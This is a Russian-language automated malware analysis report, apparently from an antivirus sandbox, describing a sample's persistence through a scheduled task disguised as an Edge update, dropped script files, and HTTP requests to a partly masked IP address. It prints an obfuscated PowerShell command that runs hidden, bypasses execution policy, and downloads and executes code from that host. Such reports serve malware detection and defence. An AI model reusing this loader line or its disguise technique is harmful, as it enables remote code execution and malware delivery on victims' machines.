Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\micros oftedgeupdate
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\new.wsf
- C:\users\public\conted.bat
- C:\users\public\conted.vbs
Сетевая активность
Подключается к
- '51.##5.231.121':222
TCP
Запросы HTTP GET
- http://51.###.231.121:222/New.wsf via 51.##5.231.121
- http://51.###.231.121:222/DA.txt via 51.##5.231.121
- http://51.###.231.121:222/DW.jpg via 51.##5.231.121
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\New.wsf"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://51.##5.231.121:222/DW.jpg'')'.RePLACe('/-/--/-/','ADSTRING'...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://51.##5.231.121:222/DW.jpg'')'.RePLACe('/-/--/-/','ADSTRING'...
